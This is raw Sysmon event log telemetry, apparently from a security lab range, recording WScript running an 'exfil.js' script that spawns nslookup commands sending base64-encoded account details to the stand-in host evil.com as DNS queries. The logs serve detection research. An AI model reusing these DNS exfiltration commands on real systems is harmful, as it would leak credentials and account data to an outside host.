14:16:28.992{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.992{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.992{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2E40-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.992{2E1864BB-17BC-629A-2C40-000000005F02}43444364C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-2E40-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.994{2E1864BB-17BC-629A-2E40-000000005F02}4004C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-2C40-000000005F02}4344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbrz.tmp 2>&1 10341000x8000000000000000199764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.960{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2D40-000000005F02}7256C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.960{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2D40-000000005F02}7256C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.960{2E1864BB-17BC-629A-2D40-000000005F02}72563568C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2C40-000000005F02}4344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.960{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2D40-000000005F02}7256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.945{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2C40-000000005F02}4344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.945{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.945{2E1864BB-17A1-629A-783D-000000005F02}55525408C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-2C40-000000005F02}4344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.947{2E1864BB-17BC-629A-2C40-000000005F02}4344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbrz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.929{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlohkgr.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.913{2E1864BB-17BC-629A-2A40-000000005F02}69966492C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2B40-000000005F02}608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.888{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2B40-000000005F02}608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.888{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.888{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.888{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.888{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.888{2E1864BB-17BC-629A-2940-000000005F02}77646016C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-2B40-000000005F02}608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.899{2E1864BB-17BC-629A-2B40-000000005F02}608C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-2940-000000005F02}7764C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohkgr.tmp 2>&1 10341000x8000000000000000199744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.872{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2A40-000000005F02}6996C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.872{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2A40-000000005F02}6996C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.857{2E1864BB-17BC-629A-2A40-000000005F02}69966492C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2940-000000005F02}7764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.841{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2A40-000000005F02}6996C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 